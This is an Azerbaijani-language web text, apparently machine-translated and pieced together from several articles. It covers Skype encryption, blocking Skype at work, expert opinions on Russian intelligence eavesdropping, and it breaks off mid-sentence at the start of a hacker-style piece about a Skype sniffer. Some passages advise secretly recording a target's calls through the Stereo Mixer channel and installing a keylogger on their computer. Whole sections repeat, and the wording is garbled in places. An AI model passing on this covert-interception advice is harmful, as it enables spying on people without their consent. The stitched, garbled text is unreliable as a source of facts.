Skype dinləmə: həqiqət və miflər. Skype-da dinləmə: VoIP söhbətlərinin ehtiyat nüsxəsini çıxarmaq üçün haker yanaşması Skype-ın dinlənildiyini necə öyrənmək olar

İnternetdə ən etibarlı və diqqəti cəlb edən gözlərdən və qulaqlardan qorunan ünsiyyət vasitəsi kimi şöhrət qazanmışdır. Bundan əlavə, işçilərin iş yerində Skype-dan istifadə etməsinə mane olmaq istəyən şirkətlər də çətin anlar yaşayır.


Skype təhlükəsizdirmi?

Təsadüfi deyil ki, Skype dinləmələrdən ən yaxşı qorunan rabitə kanallarından biri hesab olunur. Artıq Kazaa peer-to-peer şəbəkəsinin təşkilində təcrübəyə malik olan onun yaradıcıları P2P şəbəkəsi prinsipi ilə işləyən və çoxsəviyyəli trafik şifrələməsindən fəal şəkildə istifadə edən İP telefoniya xidməti yaradıblar. Həm kibercinayətkarların, həm də kəşfiyyat orqanlarının Skype-a böyük marağına baxmayaraq, protokol kifayət qədər möhkəm saxlanılır və sirlərini kənar şəxslərə açmır.

Uğurlu hücumlar və “arxa qapılar” haqqında dəfələrlə şayiələrə baxmayaraq, Skype-ın bütün uzun tarixində Skype-ın sındırıldığı və müvəffəqiyyətlə dinlənilməsi ilə bağlı heç bir rəsmi məlumat verilməmişdir. Lakin hüquq-mühafizə orqanları rahat ola bilər, çünki Skype rəhbərliyi hüquq-mühafizə orqanları ilə “hüquqi və texnoloji cəhətdən mümkün olan yerdə” əməkdaşlığa hazır olduğunu vurğulayır. Bəs adi istifadəçilər? Aydındır ki, əgər onlar qeyri-qanuni heç nə etmirlərsə və hüquq-mühafizə orqanlarından daha çox özlərini müdaxilə edənlərdən qorumaqdan narahatdırlarsa, narahat olmağa dəyməz. Öz növbəsində açarı ötürmək üçün 1024 bitlik RSA açarından istifadə edən AES-256 istifadə edərək trafikin şifrələnməsi şəxsi və işgüzar danışıqların ən məxfi iştirakçıları üçün kifayətdir.

Skype-ın bütün uzun tarixində, Skype-ın sındırıldığı və uğurla ələ keçirildiyi barədə rəsmi məlumat verilməmişdir.


Skype-ı bloklamaq niyə çətindir

Skype-a qulaq asmaq, bir çox insanın onun vasitəsilə ötürülən məlumatları qorumaq üçün heç bir vasitəyə müraciət etmədən istifadə etdiyi e-poçtun ələ keçirilməsindən qat-qat çətindir. Bununla belə, protokolun yaxşı təhlükəsizliyinə baxmayaraq, bir çox şirkət işçilərin Skype-a girişini bloklamağa üstünlük verir.

Bu niyə edilir? Bir qayda olaraq, işəgötürənlər özləri bu davranışı çox sadə izah edirlər: belə ki, Skype vasitəsilə ünsiyyət onun bilavasitə vəzifələri siyahısına daxil edilməyibsə, işçi iş saatlarında diqqətini yayındırmasın. Aşağıdakı motivasiyalar da məşhurdur: məxfi məlumatların mümkün sızmasının qarşısını almaq, Skype-ın çox yaxşı iştaha ilə istehlak etdiyi trafikə qənaət etmək... Baxmayaraq ki, sonuncu "unlimlərin" geniş nüfuzu sayəsində artıq nadirdir.

Bununla belə, Skype protokolunun bir sıra xüsusiyyətlərinə görə, hətta onu bloklamaq o qədər də sadə deyil. Fakt budur ki, firewalllardan istifadə edərək blokdan keçmək üçün Skype tərtibatçıları protokollarının paylanmış arxitekturasını yaratmaq mərhələsində çox çalışdılar. Buna görə də, Skype həm UDP, həm də TCP protokollarından istifadə edə biləcək şəkildə hazırlanmışdır və paket şifrələməsi sayəsində onları ümumi trafikdə tanımaq da olduqca çətindir. Baxmayaraq ki, əlbəttə ki, bu vəzifənin tamamilə həll edilə bilməyəcəyini söyləmək olmaz.

Skype protokolunun bir sıra xüsusiyyətlərinə görə, hətta onu bloklamaq o qədər də sadə deyil.


Bloklama probleminin həlli yolları

Bununla birlikdə, bir fərdi ofisdə Skype istifadəsini bloklamaq üçün olduqca uyğun olan bir sıra məhsullar var. Ən uğurluları "hardware" həllərdir - məsələn, Facetime-ın Unified Security Gateway və ya Cisco IOS Flexible Packet Matching. Onların köməyi ilə siz ya Skype trafikini tamamilə bloklaya, ya da onun üçün ayrılmış kanalın sabit enini təyin etməklə Skype müştərisinin iştahını bir qədər cilovlaya bilərsiniz. Sırf proqram təminatı olan "firewall"lara gəlincə, rəylərə görə, TeleMate NetSpective onların arasında kifayət qədər yaxşı olduğunu sübut etdi. Geniş istifadə olunan "firewall"ların əksəriyyəti (istehsalçılarını incitməmək üçün barmaqlarımızı göstərməyəcəyik) Skype trafikinin bloklanmasına gəldikdə, təəssüf ki, eyni səviyyədə deyil.

Bununla belə, bir daha təkrar edirəm, praktikada Skype-dan istifadəni qadağan etmək vəzifəsi ilə üzləşən idarəçilərin əksəriyyəti razılaşır ki, ən təsirli (və eyni zamanda, bəlkə də şirkət üçün ən ucuz) tədbir Skype-ı silməkdir. istifadəçi iş stansiyalarından müştəri və onun bir daha orada görünməməsini təmin etmək üçün daimi monitorinq. Ancaq bu, yenə də quraşdırılmış proqram təminatının monitorinqi üçün ən ucuz olmayan həllərin istifadəsini tələb edir.


Qayıdaq dinləmə məsələsinə.

Yaxşı, Skype-ın bloklanması haqqında danışdıqdan sonra daha maraqlı bir məsələyə - bu protokolu dinləməyə qayıdaq. Yuxarıda dediyim kimi, kiminsə bir müştəridən digərinə gedən trafikdən istifadə edə biləcəyindən qorxmamaq üçün kifayət qədər şifrələmə imkanları var. Bununla belə, Skype-ı dinləmək və oxumaq olar. Ancaq Skype müştərisi tərəfindən göndərilən trafikin ələ keçirilməsi və şifrəsinin açılması ilə deyil, hələ şifrələnməmiş və ötürülməmiş məlumat axınının qarşısını almaqla. Təbii ki, bunun üçün Skype danışıqlarına qulaq asmaq istədikləri şəxsin kompüterinə daxil olmaq lazımdır.

Bu, həm səs kartından və klaviaturadan bütün məlumatları ələ keçirən proqramların köməyi ilə həyata keçirilə bilər (hər şeydən sonra, Skype-da söhbət var və siz də onu izləmək istəyirsiniz), həm də Skype üçün xüsusi olaraq "uyğunlaşdırılmış" xüsusi həllər. Birinci seçim ümumiyyətlə az səylə həyata keçirilə bilər - eyni standart Səs Yazıcıda giriş kanalı kimi Stereo Mikser seçin (səs kartından asılı olaraq, o, fərqli adlandırıla bilər - məsələn, "Eşitdiyiniz şey"). Üstəlik bəzi pulsuz keylogger , Google-dan istifadə edərək beş dəqiqə ərzində tapıla bilər və sizdə hazır işçi izləmə sistemi var. Eyni şey klaviatura daxilinə də aiddir - "buğdanı samandan", yəni Word-də yazılmış sənədlərdən Skype vasitəsilə göndərilən mesajları əl ilə ayırmalı olacaqsınız. İxtisaslaşdırılmış vasitələrə gəlincə, Google onların əslində az olduğunu göstərdi. SearchInform SkypeSniffer haqlı olaraq ən yaxşılardan biri hesab olunur. Proqram müstəqil olaraq Skype səs və klaviatura girişini ümumi axından ayıra bilər, həmçinin toplanmış istifadəçi mesajlarının verilənlər bazasında güclü axtarış imkanlarına malikdir. Bundan əlavə, bu, məlumat sızmasından qorunmaq üçün güclü bir həllin tərkib hissəsidir, onu istifadə edərkən istəsəniz yüksəldə bilərsiniz.


Xülasə

Ümumiyyətlə, deyə bilərik ki, əgər beynəlxalq terrorçu deyilsinizsə, o zaman Skype danışıqlarınıza müdaxilə etməkdən narahat olmaq lazım deyil - adi insanlar, hətta texniki cəhətdən çox fərasət olsalar da, hələ bunu edə bilmirlər. İstəyirsinizsə, Skype trafikini bloklaya bilərsiniz, lakin Skype müştərisinin özünün quraşdırılmasını bloklamaq daha asandır. Istifadəçinin kompüterində interceptorlar quraşdıraraq Skype-da söhbətlərə qulaq asmaq çətin deyil - əlbəttə ki, belə bir ehtiyac varsa.

“Vedomosti” bu xəbəri dünən bir neçə bazar iştirakçılarına istinadən yayıb. Bir neçə ildən sonra ekspertlərin fikrincə, əvvəllər təhlükəsizlik baxımından ən etibarlı hesab edilən xidmətdə sirr aydın olur. Üstəlik, söhbətlərdən əlavə, istifadəçilərin yerinin də qeydə alındığı iddia edilir.

Axşama yaxın Microsoft-dan (hazırda Skype-a sahibdir) şərh gəldi - bəli, şirkətin proqram təminatının mənbə kodunu təmin etmək üçün həqiqətən də kəşfiyyat xidmətləri ilə razılaşması var, əks halda Rusiya dövlət qurumlarında proqramlardan istifadə etmək mümkün olmayacaqdı. . Lakin kodların verilməsi o demək deyil ki, kəşfiyyatçılar istifadəçi yazışmalarını oxusunlar və ya istifadəçi məlumatlarına çıxış əldə etsinlər. Şifrələmə alqoritmini bilən, lakin açarı olmayan mesajı tutmaq mümkün deyil, açar istifadəçi tərəfində yaradılmışdır;

Texnologiyaların və İnternet İnfrastrukturunun İnkişafına Yardım Fondunun icraçı direktoru Matvey Alekseevlə orta statistik internet istifadəçisinin kəşfiyyat orqanlarının dinləmələrindən qorxmalı olub-olmaması ilə bağlı söhbət etdik.

"Düzünü desəm, şifrəni açmaq üçün açarlarınız varsa, hər şey mümkündür" dedi ekspert "Əgər üç il əvvəl Microsoft Skype-ı satın almazdan əvvəl yalnız ünvanlama protokolları var idisə, onda Microsoft-da artıq hər şey var." Çin texnologiyası KeyLogger isə sanki rus dilindədir... ümumiyyətlə, hashtaglarla həyata keçirilən sözün tanınması kimi bir şey daha çox imkan verə bilər. Hər halda, narahat olmağa dəyməz, çox güman ki, “dinləmə” SORM (əməliyyat-axtarış tədbirləri sistemi) çərçivəsində həyata keçiriləcək və xüsusi xidmət orqanlarının gücü hər şeyi əhatə edə bilməyəcək. qlobal trafik."

“Adi” istifadəçilərin telefonları dinlənilməyəcək?

Anton Razumov, Check Point Software Technologies-in təhlükəsizlik üzrə konsaltinq qrupunun rəhbəri, hesab edir ki, Skype istifadəçilərinin mümkün dinləmələri bazar üçün yenidir. "Əvvəllər şübhələr ola bilərdi, amma indi bu, rəsmi olmasa da, həqiqətə çox yaxın bir təsdiq oldu" dedi, "Lakin bunun adi istifadəçilər üçün əhəmiyyəti yoxdur. İnternetdə olduğu kimi praktiki olaraq heç bir təhlükəsizlik qalmayıb. Məsələn, bu, müxtəlif ziyarətçi sayğacları (cins, ziyarətçilərin yaşı) tərəfindən vebmasterlərə verilən fərdiləşdirilmiş axtarış nəticələrində və statistikada aydın görünür. İstifadəçinin əvvəllər daxil olduğu saytlar və sosial şəbəkələrdə buraxdığı məlumatlar əsasında onun maraqları nəzərə alınır”.

Anton Razumovun fikrincə, biznes nümayəndələri mümkün “telsiz dinləmə”dən qorxmamalıdırlar, ancaq söhbət xarici kəşfiyyat xidmətlərindən gedirsə. “Başqa bir məsələ bu məlumatların Rusiya kəşfiyyat xidmətlərinin əlçatanlığı və onlara etimad məsələsi, bu məlumatların məhkəmə qərarı olmadan rəqabətin maraqları naminə istifadə edilməsinin mümkünlüyü qorxusudur.

Texniki cəhətdən bu, kifayət qədər real görünür, ekspert əmindir, xüsusən də nəzərə alsaq ki, Skype-ı aldıqdan sonra Microsoft bu məhsulun arxitekturasını dəyişməyə başlayıb. Əvvəllər, həddindən artıq hallarda (məsələn, dinamik ünvan tərcüməsi məhdudiyyətlərini keçmək üçün) trafik birbaşa istifadəçidən istifadəçiyə keçdikdə, aralıq qovşaqlardan istifadə olunurdu (həmçinin Skype istifadəçiləri, lakin daha açıq İnternet bağlantısı ilə); ). İndi, həqiqətən, serverlərin rolu daha da əhəmiyyətli hala gəldi, bu da trafikə qulaq asmaq vəzifələrini həll etməyi asanlaşdırır.

Ümumiyyətlə, kəşfiyyat orqanları tərəfindən trafikin ələ keçirilməsi və təhlili bütün dünyada normal haldır. SORM və Echelon uzun illərdir ki, mövcuddur”.

Hələ gizlənə bilərsən

Anton Razumov bu hekayəni videokameralardan və görüntü tanıma sistemindən gələn məlumatların birləşməsi sayəsində avtomobilin dövlət nömrə nişanından istifadə edərək müəyyən müddət ərzində onun hərəkət marşrutunu müəyyən etmək imkanı ilə müqayisə edir.

Matvey Alekseyevin də qeyd etdiyi texnologiya ilə bağlı ekspert deyir: “Mən hələ də bütün danışan Skype abunəçilərinin rus nitqini anında tanıyan və açar sözlər üçün təhlil edə bilən sistemləri bilmirəm. Hesab edirəm ki, müəyyən şəxsləri nəzarət altına almaq tamamilə mümkündür.

Lakin istənilən halda təhlükəsizliyə kompleks çoxsəviyyəli yanaşma tətbiq edilməlidir. Xüsusilə, bu mexanizmin onlara hər hansı bir şəkildə zərər verə biləcəyindən şübhələnən şəxslər Skype-ın tamamilə ayrı-ayrı mexanizmlər tərəfindən yaradılan açarlarla şifrlənmiş əvvəlcədən kodlanmış məlumatları ötürməsi üçün əlavə olaraq səs skremblerlərindən istifadə edə bilərlər.

Cinayətlə mübarizə vasitəsi kimi Skype-ın dinlənməsi

“Rusiya kəşfiyyat xidmətlərinə Skype-ı dinləmək imkanının təmin edilməsi köklü qlobal təcrübədir”, - mən əminəm. Daria Abramova, Orange Business Services Marketinq Kommunikasiyaları Direktoru, - ABŞ və Çin uzun müddətdir ki, bunu edir və bunu cinayətkarlıqla mübarizə aləti hesab edirlər. Fransa da eyni istiqamətdə irəliləyir.

İnternetdə mütləq məxfiliyin qorunmasının mümkün olduğunu demək çətindir. Təəccüblü deyil ki, təşkilatlar kommersiya məlumatlarını ötürmək üçün sertifikatlı provayderlər tərəfindən təmin edilən təhlükəsiz virtual şəxsi şəbəkə (VPN) xidmətindən istifadə edirlər. Bu cür vasitələr rəqiblərin və təcavüzkarların hiylələrindən qorunmağa kömək edəcək, lakin biz başa düşməliyik ki, kəşfiyyat xidmətləri istənilən halda onlara lazım olan məlumatlara çıxış əldə edəcək”.

Kəşfiyyat xidmətləri tərəfindən Skype-ın mümkün dinləmələri xəbər deyil Alexandra Vlasov, T-systems CIS şirkətinin İKT şöbəsinin müdiri. "Microsoft, başqa şeylər arasında, "telsiz dinləmə" qabiliyyətini əldə etmək üçün əldə etdi, "Belə bir populyar xidmətin uzun müddət hüquq-mühafizə orqanlarının diqqətindən kənarda qalacağına inanmaq sadəlövhlük olardı. Əvvəllər Skype həqiqətən də kəşfiyyat agentlikləri üçün “çırtmaq üçün çətin qoz” idi, lakin onu satın aldıqdan sonra amerikalıların ona tam çıxışı var. “Skype” və “Microsoft”un Rusiya təhlükəsizlik qüvvələrinə konkret nəyi açıqladığını söyləmək çətindir.

Texniki olaraq, bütün rabitə mərkəzlərində quraşdırılmış SORM sistemindən istifadə etməklə "telsiz dinləmə" həyata keçirilə bilər. Bir giriş altında eyni anda bir neçə kompüterdən Skype-a qoşula biləcəyinizi nəzərə alsanız, Skype-da hər hansı bir hesaba qoşulmaq üçün texniki parolların olmadığına zəmanət yoxdur.

İnternetdə hüquq-mühafizə orqanlarının əli çatmayan yer qalmayıb. Cinayət məcəlləsinə hörmət edən vətəndaşlar üçün heç bir təhlükə yoxdur. Məncə, gizlənməyin ən təsirli yolu sürətlə artan informasiya axınında itməkdir”.

Uzun illərdir ki, Skype İnternet üzərindən ən etibarlı və yad gözlərdən və qulaqlardan qorunan ünsiyyət vasitəsi kimi tanınır. Bundan əlavə, işçilərin iş yerində Skype-dan istifadə etməsinə mane olmaq istəyən şirkətlər də çətin anlar yaşayır.


Skype təhlükəsizdirmi?

Təsadüfi deyil ki, Skype dinləmələrdən ən yaxşı qorunan rabitə kanallarından biri hesab olunur. Artıq Kazaa peer-to-peer şəbəkəsinin təşkilində təcrübəyə malik olan onun yaradıcıları P2P şəbəkəsi prinsipi ilə işləyən və çoxsəviyyəli trafik şifrələməsindən fəal şəkildə istifadə edən İP telefoniya xidməti yaradıblar. Həm kibercinayətkarların, həm də kəşfiyyat orqanlarının Skype-a böyük marağına baxmayaraq, protokol kifayət qədər möhkəm saxlanılır və öz sirlərini kənar şəxslərə açmır.

Uğurlu hücumlar və arxa qapılar haqqında dəfələrlə şayiələrə baxmayaraq, Skype-ın bütün uzun tarixində Skype-ın sındırıldığı və müvəffəqiyyətlə dinlənilməsi ilə bağlı heç bir rəsmi məlumat verilməmişdir. Amma hüquq-mühafizə orqanları rahat ola bilər, çünki Skype rəhbərliyi onun hüquq-mühafizə orqanları ilə əməkdaşlığa hazır olduğunu vurğulayır”. hüquqi və texnoloji baxımdan mümkün olan hər yerdə". Və adi istifadəçilər? Aydındır ki, əgər onlar qeyri-qanuni heç bir şey etmirlərsə və hüquq-mühafizə orqanlarından daha çox müdaxilə edənlərdən qorunmaqdan narahatdırlarsa, o zaman narahat olmağa dəyməz. AES-256-dan istifadə edərək trafikin şifrələnməsi, onların açarı Öz növbəsində 1024 bitlik RSA açarından istifadə olunur ki, bu da şəxsi və işgüzar danışıqların ən tələbkar iştirakçıları üçün məlumatın məxfiliyini qorumaq üçün kifayətdir.

Skype-ı bloklamaq niyə çətindir

Skype-a qulaq asmaq, bir çox insanın onun vasitəsilə ötürülən məlumatları qorumaq üçün heç bir vasitəyə müraciət etmədən istifadə etdiyi e-poçtun ələ keçirilməsindən qat-qat çətindir. Bununla belə, protokolun yaxşı təhlükəsizliyinə baxmayaraq, bir çox şirkət işçilərin Skype-a girişini bloklamağa üstünlük verir.

Bu niyə edilir? Bir qayda olaraq, işəgötürənlər özləri bu davranışı çox sadə izah edirlər: belə ki, Skype vasitəsilə ünsiyyət onun bilavasitə vəzifələri siyahısına daxil edilməyibsə, işçi iş saatlarında diqqətini yayındırmasın. Aşağıdakı motivasiyalar da məşhurdur: məxfi məlumatların mümkün sızmasının qarşısını almaq, Skype-ın çox yaxşı iştaha ilə istehlak etdiyi trafikə qənaət etmək... Baxmayaraq ki, sonuncu "unlimlərin" geniş nüfuzu sayəsində artıq nadirdir.

Bununla belə, Skype protokolunun bir sıra xüsusiyyətlərinə görə, hətta onu bloklamaq o qədər də sadə deyil. Fakt budur ki, firewalllardan istifadə edərək blokdan keçmək üçün Skype tərtibatçıları protokollarının paylanmış arxitekturasını yaratmaq mərhələsində çox çalışdılar. Buna görə də, Skype həm UDP, həm də TCP protokollarından istifadə edə biləcək şəkildə hazırlanmışdır və paket şifrələməsi sayəsində onları ümumi trafikdə tanımaq da olduqca çətindir. Baxmayaraq ki, əlbəttə ki, bu vəzifənin tamamilə həll edilə bilməyəcəyini söyləmək olmaz.

Bloklama probleminin həlli yolları

Google (və ya Yandex, bu axtarış sistemi sizə daha yaxındırsa) istifadə edərək, sistem administratorlarının iptables istifadə edərək Skype-ı bloklamaq üçün bir resept tapmaq üçün müxtəlif müvəffəqiyyət dərəcələri ilə çalışdıqları bir çox forum tapa bilərsiniz. Görünür, Skype tərtibatçıları həm administratorların, həm də firewall istehsalçılarının məhsullarını bloklamaq cəhdlərini izləyirlər və onlardan ən uğurluları Skype trafikinin bloklanmasının yeni üsullarından uğurla yan keçən müştərinin yeni versiyasını buraxmaqla zərərsizləşdirilir.

Bununla birlikdə, bir fərdi ofisdə Skype istifadəsini bloklamaq üçün olduqca uyğun olan bir sıra məhsullar var. Ən uğurluları "hardware" həllərdir - məsələn, Facetime-ın Unified Security Gateway və ya Cisco IOS Flexible Packet Matching. Onların köməyi ilə siz ya Skype trafikini tamamilə bloklaya bilərsiniz, ya da onun üçün ayrılmış kanalın sabit enini təyin etməklə Skype müştərisinin iştahını bir qədər cilovlaya bilərsiniz. Sırf proqram təminatı olan "firewall"lara gəlincə, rəylərə görə, TeleMate NetSpective onların arasında yaxşı biri olduğunu sübut etdi. Geniş istifadə olunan "firewall"ların əksəriyyəti (istehsalçılarını incitməmək üçün barmaqlarımızı göstərməyəcəyik) Skype trafikinin bloklanmasına gəldikdə, təəssüf ki, eyni səviyyədə deyil.

Buna baxmayaraq, bir daha təkrar edirəm, praktikada Skype-dan istifadəni qadağan etmək vəzifəsi ilə qarşılaşan idarəçilərin əksəriyyəti razılaşır ki, ən təsirli (və eyni zamanda, bəlkə də şirkət üçün ən ucuz) tədbir Skype-ı silməkdir. müştərini istifadəçi iş stansiyalarından götürür və orada bir daha görünə bilməyəcəyinə daim əmin olur. Ancaq bu, yenə də quraşdırılmış proqram təminatının monitorinqi üçün ən ucuz olmayan həllərin istifadəsini tələb edir.

Qayıdaq dinləmə məsələsinə.

Yaxşı, Skype-ın bloklanması haqqında danışdıqdan sonra daha maraqlı bir məsələyə - bu protokolu dinləməyə qayıdaq. Yuxarıda dediyim kimi, kiminsə bir müştəridən digərinə gedən trafikdən istifadə edə biləcəyindən qorxmamaq üçün kifayət qədər şifrələmə imkanları var. Bununla belə, Skype-ı dinləmək və oxumaq olar. Ancaq Skype müştərisi tərəfindən göndərilən trafikin ələ keçirilməsi və şifrəsinin açılması ilə deyil, hələ şifrələnməmiş və ötürülməmiş məlumat axınının qarşısını almaqla. Təbii ki, bunun üçün Skype danışıqlarına qulaq asmaq istədikləri şəxsin kompüterinə daxil olmaq lazımdır.

Bu, həm səs kartından və klaviaturadan bütün məlumatları ələ keçirən proqramların köməyi ilə həyata keçirilə bilər (hər şeydən sonra, Skype-da söhbət var və siz də onu izləmək istəyirsiniz), həm də Skype üçün xüsusi olaraq "uyğunlaşdırılmış" xüsusi həllər. Birinci seçim ümumiyyətlə az səylə həyata keçirilə bilər - eyni standart Səs Yazıcıda giriş kanalı kimi Stereo Mikser seçin (səs kartından asılı olaraq, o, fərqli adlandırıla bilər - məsələn, "Eşitdiyiniz şey"). Üstəlik bəzi pulsuz keylogger , Google-dan istifadə edərək beş dəqiqə ərzində tapıla bilər və sizdə işçilərin izlənilməsi üçün hazır bir sistem var. Eyni şey klaviatura daxilinə də aiddir - "buğdanı samandan" əl ilə ayırmalı olacaqsınız, yəni Word-də yazılmış sənədlərdən Skype vasitəsilə göndərilən mesajlar. İxtisaslaşdırılmış vasitələrə gəlincə, Google onların əslində az olduğunu göstərdi. SearchInform SkypeSniffer haqlı olaraq ən yaxşılardan biri hesab olunur. Proqram müstəqil olaraq Skype səs və klaviatura daxiletməsini ümumi axından ayıra bilər, həmçinin toplanmış istifadəçi mesajlarının verilənlər bazasında güclü axtarış imkanlarına malikdir. Bundan əlavə, məlumat sızmasından qorunmaq üçün güclü bir həllin tərkib hissəsidir, istifadə edərkən istəsəniz onu yüksəldə bilərsiniz.

Xülasə

Ümumiyyətlə, deyə bilərik ki, əgər beynəlxalq terrorçu deyilsinizsə, o zaman Skype danışıqlarınıza müdaxilə etməkdən narahat olmaq lazım deyil - adi insanlar, hətta texniki cəhətdən çox fərasət olsalar da, hələ bunu edə bilmirlər. İstəyirsinizsə, Skype trafikini bloklaya bilərsiniz, lakin Skype müştərisinin özünün quraşdırılmasını bloklamaq daha asandır. Istifadəçinin kompüterində interceptorlar quraşdıraraq Skype-da söhbətlərə qulaq asmaq çətin deyil - əlbəttə ki, belə bir ehtiyac varsa.

– Söhbətlərə qulaq asmağın mümkün olmadığı barədə şayiələr və iddialar dərhal çoxalmağa başladı. Ümumiyyətlə, Skype super təhlükəsiz bir sistemdir və “heç kim” və “heç vaxt”, hətta kəşfiyyat xidmətləri də nə haqqında danışdığınızı öyrənə biləcəklər.

Gəlin bunu anlayaq:

Skype-ın ultra-təhlükəsizliyi: mif və ya reallıq?

Mövzudan kiçik bir sapma.

“Kişi tərəfindən ediləni başqası sındıra bilər” prinsipinə əsasən, Skype sistemi dinləmələrə qarşı tam təhlükəsiz sistem deyil.

Məsələ burasındadır: hansı texniki və ya proqram hiylələrindən istifadə olunmasından asılı olmayaraq, onların hamısı başqa bir şəxs tərəfindən “aşkar edilə” bilər. Sual olunur: hər şey nəyin bahasına “aşkar” olacaq? Aydındır ki, xüsusi avadanlıqdan istifadə etmək və mütəxəssisləri cəlb etmək lazımdır və bütün bunlar bəzən kifayət qədər pul deməkdir.

Buna görə də təhlükəsizlik sistemləri sistemi qeyri-mümkün etmək üçün deyil, mümkün qədər bahalı etmək üçün qurulur və buna görə də adi vətəndaşın söhbətlərini deşifrə etmək üçün mənasızdır!

Buna görə də (əlbəttə ki, axtarışda olan terrorçu deyilsinizsə) Skype-dakı söhbətləriniz kəşfiyyat xidmətlərindən deyil (istədikləri təqdirdə bütün söhbətlərinizi həmişə “aşkar edə” bilər), rəqiblər kimi daha prozaik “casuslardan” qorunur. , qohumlar, rəislər, həmkarlar, bədxahlar və s.

Bu sistemin dinləmələrdən təhlükəsizliyi ilə bağlı bütün bəyanatlarda Skype-ın məhz bu qorunması müzakirə olunur.

Skype niyə dinləmədən qorunur?

Bu sistem sözdə istifadə edir. paylanmış struktur protokolu, yəni. Hər bir kiçik məlumat bir paketdə ötürülür, bu da şifrələnir. BitTorrent fayl ötürmə proqramı təxminən eyni şəkildə işləyir. Buna görə də, söhbəti müəyyən etmək və onu yalnız trafik təhlili ilə dinləmək olduqca çətindir və həmişə praktik deyil.

Skype-da söhbətlərin, mətn mesajlarının və göndərilən faylların qorunması çox güclüdür: təkcə yuxarıda sadalanan hər şey deyil, həm də IP ünvanınız və hesab məlumatlarınız şifrələnir. Lakin lazım gələrsə, kəşfiyyat agentlikləri məlumatlarınıza daxil olmaq üçün çox narahat olmağa belə ehtiyac duymurlar: Microsoft Korporasiyası Skype-ı satın aldıqdan sonra korporasiya müvafiq sorğu və məhkəmə qərarı əsasında bütün məlumatlarınızı maraqlı kəşfiyyat orqanlarına təqdim edəcək. Üstəlik: xüsusilə Çin səlahiyyətliləri üçün korporasiya Çin hakimiyyəti üçün potensial təhlükəli olan məlumatları avtomatik olaraq müəyyən edən və bütün məlumatları senzuradan keçirən izləmə proqramlarının xüsusi versiyasını yaratmışdır.

Müxtəlif cihazlardan hesaba girişə icazə verildikdən sonra Skype mühafizəsinin səviyyəsi bir qədər azalıb. Ancaq söhbətləriniz üçün çox narahat olmamalısınız: smartfon və ya planşetinizdə Skype-dakı mesajlarınız və söhbətlərinizdən daha çox zəruri və maraqlı məlumatlar var, məsələn, bank kartlarınıza və ya sosial media hesablarınıza giriş.

Ancaq Skype həqiqətən qorunmayan bir sistemə çevrildikdə, şifrələnmiş məlumat paketini göndərməzdən ƏVVƏL: mikrofondan məlumat alaraq söhbət zamanı, fayl göndərmə anında, fayl adını bilmək və ya keyloggerdən istifadə edərək mesaj yazmaq. Beləliklə, Skype-ın təhlükəsizliyi kompüterinizdə başlayır və bitir.

Söhbətə müdaxilə etmək üçün standart olaraq Windows quruluşuna daxil olan səsyazma proqramının daxil olan kanalını Stereo Mixer kanalına keçirməlisiniz, hər hansı bir keylogger sayəsində mətn mesajlarını oxuya bilərsiniz; İnternetdə çoxu. Ancaq bunların hamısı ev kompüterindədir.

Belə bir "telsiz dinləmə" sistemi iş kompüterlərində işləməyəcək: ofisdaxili şəbəkəyə, kompüter adlarına və s.

Söhbətləri (və daha çox) dinləmək üçün bəzi ofislər və şirkətlər sözdə istifadə edirlər. Şirkətin serverlərində quraşdırılmış və təkcə Skype-a "dinləmək" ilə deyil, həm də e-poçt müştərilərinin, ünvanların, ofisdən göndərilən məktubların, xarici disklərin işini yoxlamaqla məşğul olan DLP sistemləri (Məlumat Sızmasının qarşısının alınması (İngilis dili)) və s. daha çox - ümumiyyətlə, şirkət məlumat sızmasının baş verə biləcəyi hər şey. Hazırda şirkətlərin təxminən 20%-i belə sistemlərlə təchiz olunub, lakin müdrik sahib mühüm məlumatların və diqqətsiz işçilərin işə deyil, söhbətlərə sərf etdiyi vaxtın qorunmasına və qorunmasına qənaət etmir.

Beləliklə, yuxarıda deyilən hər şeyə əsaslanaraq Skype-ın dinləmələrə qarşı təhlükəsizliyi haqqında nə deyə bilərik?

Skype-ın dinlənilməsindən qorunma

Bir tərəfdən, Skype-ın yaradıcıları özləri üçün ən əlverişli həllərdən istifadə edərək, xidmətlərini mümkün qədər təhlükəsiz etdilər.

Digər tərəfdən, “insan amilinin” təsiri, yəni. Skype-ın son istifadəçisi, Skype tərtibatçılarının bütün proqram və avadanlıq hiylələrini inkar edə bilər.

Və buna görə də: Skype-da təhlükəsiz söhbətlər və yazışmalar etmək istəyirsiniz? Əgər “Bəli”, onda antivirus proqramınızı mütəmadi olaraq yeniləyin, tercihen pulsuz deyil, tanınmış bir tərtibatçının pullu versiyasıdır. Məlumatı yüklədiyiniz və əlaqə saxladığınız mənbələri yoxlayın.

Ümumiyyətlə, kompüterinizdə maksimum qorunma yaradın və Skype artıq "telsiz dinləmədən" maksimum dərəcədə qorunur!

.
Əvvəllər kilobayt yazaraq mətn söhbətlərində saatlarla vaxt sərf etməli olsaydıq
Məlumat, indi qədər limitsiz internetin yayılması sayəsində
Rus hinterlandı, paytaxtdan ən ucqar internet istifadəçiləri belə öyrənə bilər
səsli ünsiyyətin sevinci.

Tutma üsulları

Məqsəd haqqında qərar verdik və indi cansıxıcı nəzəriyyəni oxumalıyıq, onsuz
Belə bir məsələdə irəliləyiş əldə etmək mümkün deyil. Küçədə gəzin, özünüzə bir fincan dəmləyin
isti şərab, kreslonunuzda rahat olun və müqəddəs bilikləri mənimsəməyə başlayın.

Metod №1

Sözün əsl mənasında 2009-cu ilin oktyabr ayının əvvəlində bir usta qabaqcıl sniffer yazdı,
Bu barədə Ümumdünya Şəbəkəsinin bütün təhlükəsizlik resurslarında yazılmışdır. Əgər inanırsansa
xəbərlər və iyləmə müəllifi, məlum olur ki, bibər Skype trafikini kəsməyi bacarıb
(yaxşı, bu əvvəllər edilə bilərdi) və ən əsası onu deşifrə edin.

Belə bir hadisəni görməməzlikdən gələ bilməzdim, ona görə də dərhal tapmaq qərarına gəldim
dəyərli mənbə (snayferin müəllifi çox mehriban idi və tam şəkildə yerləşdirdi
Sorets), lakin pis ayrıldı. Xalq düşmənləri xəzinə olan sortları mövzudan uzaqlaşdırdılar
site, ancaq Google'da bir saat davam edən məcburi gediş normal nəticə vermədi. Mən indicə
Bəzi işləməyən növlərə rast gəldim.

Tamamilə çarəsiz halda bu seçimdən imtina etdim. Dayan! Hər şey uğursuz olarsa, o zaman
Bütün bunları sənə niyə deyirəm? Bu sadədir, vəziyyət hər gün dəyişir və
məqalənin nəhəng dünyada dərc olunması tamamilə mümkündür
Bu üçlüyün işləyən növləri internetdə görünəcək. Heç vaxt bilmirsən. Yadda saxlasa
